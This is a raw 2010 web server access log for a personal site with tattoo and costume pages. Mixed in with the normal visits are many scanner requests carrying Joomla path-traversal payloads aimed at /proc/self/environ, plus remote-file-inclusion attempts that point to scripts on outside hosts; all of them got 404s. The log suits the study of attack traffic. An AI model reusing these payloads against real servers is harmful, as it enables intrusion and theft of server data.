24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:09:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
91.121.2.170 - - [10/Jun/2010:01:09:59 -0500] "GET /logs/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.sereiadomar.net/tmp/id1.txt????????????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
91.121.2.170 - - [10/Jun/2010:01:09:59 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.sereiadomar.net/tmp/id1.txt????????????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.121.2.170 - - [10/Jun/2010:01:09:59 -0500] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.sereiadomar.net/tmp/id1.txt????????????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
207.191.229.96 - - [10/Jun/2010:01:10:02 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.191.229.96 - - [10/Jun/2010:01:10:02 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.191.229.96 - - [10/Jun/2010:01:10:02 -0500] "GET /logs//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
24.205.181.155 - - [10/Jun/2010:01:10:06 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:06 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:06 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:06 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:07 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
207.191.229.96 - - [10/Jun/2010:01:10:08 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.191.229.96 - - [10/Jun/2010:01:10:08 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.191.229.96 - - [10/Jun/2010:01:10:08 -0500] "GET /logs//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
24.205.181.155 - - [10/Jun/2010:01:10:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:14 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:14 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:42 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:42 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
24.205.181.155 - - [10/Jun/2010:01:10:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
153.107.97.155 - - [10/Jun/2010:01:11:35 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/w/index.php?title=Costume_design&printable=yes""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
153.107.97.155 - - [10/Jun/2010:01:11:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
153.107.97.155 - - [10/Jun/2010:01:11:42 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
153.107.97.155 - - [10/Jun/2010:01:11:43 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
153.107.97.155 - - [10/Jun/2010:01:11:43 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
153.107.97.155 - - [10/Jun/2010:01:11:44 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
153.107.97.155 - - [10/Jun/2010:01:11:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
153.107.97.155 - - [10/Jun/2010:01:11:49 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
153.107.97.155 - - [10/Jun/2010:01:11:52 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
174.121.158.187 - - [10/Jun/2010:01:12:36 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:12:36 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.191.229.96 - - [10/Jun/2010:01:12:53 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.191.229.96 - - [10/Jun/2010:01:12:53 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.191.229.96 - - [10/Jun/2010:01:12:53 -0500] "GET /logs//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.191.229.96 - - [10/Jun/2010:01:12:59 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.191.229.96 - - [10/Jun/2010:01:12:59 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.191.229.96 - - [10/Jun/2010:01:12:59 -0500] "GET /logs//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
91.203.68.45 - - [10/Jun/2010:01:13:06 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
74.55.65.134 - - [10/Jun/2010:01:13:06 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
91.203.68.45 - - [10/Jun/2010:01:13:06 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
74.55.65.134 - - [10/Jun/2010:01:13:06 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
91.203.68.45 - - [10/Jun/2010:01:13:06 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:01:13:06 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
74.55.65.134 - - [10/Jun/2010:01:13:14 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [10/Jun/2010:01:13:14 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
173.201.187.126 - - [10/Jun/2010:01:13:29 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
173.201.187.126 - - [10/Jun/2010:01:13:29 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.201.187.126 - - [10/Jun/2010:01:13:29 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
88.191.94.188 - - [10/Jun/2010:01:13:58 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:01:13:58 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:01:13:59 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
123.236.186.122 - - [10/Jun/2010:01:13:59 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.google.co.in/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&channel=s&hl=en&source=hp&q=costumes+of+different+nations&meta=&btnG=Google+Search""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
123.236.186.122 - - [10/Jun/2010:01:14:00 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
123.236.186.122 - - [10/Jun/2010:01:14:00 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
123.236.186.122 - - [10/Jun/2010:01:14:02 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
123.236.186.122 - - [10/Jun/2010:01:14:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
123.236.186.122 - - [10/Jun/2010:01:14:22 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
123.236.186.122 - - [10/Jun/2010:01:14:34 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
88.191.94.188 - - [10/Jun/2010:01:14:52 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:01:14:53 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:01:14:53 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.203.68.45 - - [10/Jun/2010:01:15:25 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:01:15:25 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
202.63.240.21 - - [10/Jun/2010:01:16:42 -0500] "GET /logs/access_log.1271635200//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:01:16:42 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:01:16:42 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:01:17:24 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:01:17:24 -0500] "GET /logs/access_log.1271635200//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:01:17:24 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.121.158.187 - - [10/Jun/2010:01:17:27 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:17:27 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:17:28 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:17:44 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:18:25 -0500] "GET /logs/index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:18:28 -0500] "GET /index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
65.55.62.100 - - [10/Jun/2010:01:19:00 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; MathPlayer 2.10d; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; InfoPath.2; Zune 3.0; .NET CLR 3.0.30729)"
174.121.158.187 - - [10/Jun/2010:01:19:33 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:19:33 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
212.241.179.30 - - [10/Jun/2010:01:20:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:01:20:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:01:20:45 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:01:20:45 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:01:20:45 -0500] "GET /logs//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:01:20:45 -0500] "GET /logs//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
174.121.158.187 - - [10/Jun/2010:01:21:14 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:21:14 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:21:25 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:21:26 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:22:07 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:22:11 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.201.187.126 - - [10/Jun/2010:01:22:11 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
212.241.179.30 - - [10/Jun/2010:01:22:12 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
173.201.187.126 - - [10/Jun/2010:01:22:12 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.201.187.126 - - [10/Jun/2010:01:22:12 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
212.241.179.30 - - [10/Jun/2010:01:22:12 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:01:22:12 -0500] "GET /logs//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:01:22:52 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:01:22:52 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:01:22:53 -0500] "GET /logs//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
174.121.158.187 - - [10/Jun/2010:01:23:07 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:23:07 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:23:07 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
61.110.10.185 - - [10/Jun/2010:01:23:18 -0500] "GET /logs//atom.php5?page=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:23:18 -0500] "GET //atom.php5?page=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:23:35 -0500] "GET /logs/access_log.1271203200//atom.php5?page=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
